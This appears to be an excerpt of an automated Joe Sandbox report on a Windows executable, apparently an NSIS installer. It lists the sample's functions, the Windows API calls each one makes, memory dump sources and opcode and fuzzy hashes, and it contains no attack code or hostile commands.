Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 1892508949-455884830
Opcode ID: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 00401F12 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405B63: ShellExecuteExW.SHELL32(?), ref: 00405B72

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069E8

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
@, xrefs: 00401F8A

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 165873841-3372431936
Opcode ID: 06f62b84b45cca0933d7e274007704b9a906a5d7bcac17d6b3d1b56fa1781a8d
Instruction ID: 706d8f23dd4fc365793d21c3b3cee38f3579e955c6bce5a1691758ef83551cc9
Opcode Fuzzy Hash: 06f62b84b45cca0933d7e274007704b9a906a5d7bcac17d6b3d1b56fa1781a8d
Instruction Fuzzy Hash: 20115B71E042189ADB50EFB9CA49B8CB6F4BF04304F24447AE405F72C1EBBC89459B18

Uniqueness

Uniqueness Score: -1.00%

Function 004069B5 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069DB
GetExitCodeProcess.KERNELBASE(?,?), ref: 004069E8

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 5001a44abd0e5b0949431453b9a2c42ce6d4f473903e6ae1ef305ee8f225f71a
Instruction ID: f5f2e02d25af80b97bb350a16654da7f97250589dc800b1049f4071f8343982b
Opcode Fuzzy Hash: 5001a44abd0e5b0949431453b9a2c42ce6d4f473903e6ae1ef305ee8f225f71a
Instruction Fuzzy Hash: 0CE0D8B1A00118FBDB109F54DE05E9E7B6EDF44750F110033FA01B6590D7B19E25DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B63 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B72

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B12 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNEL32(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
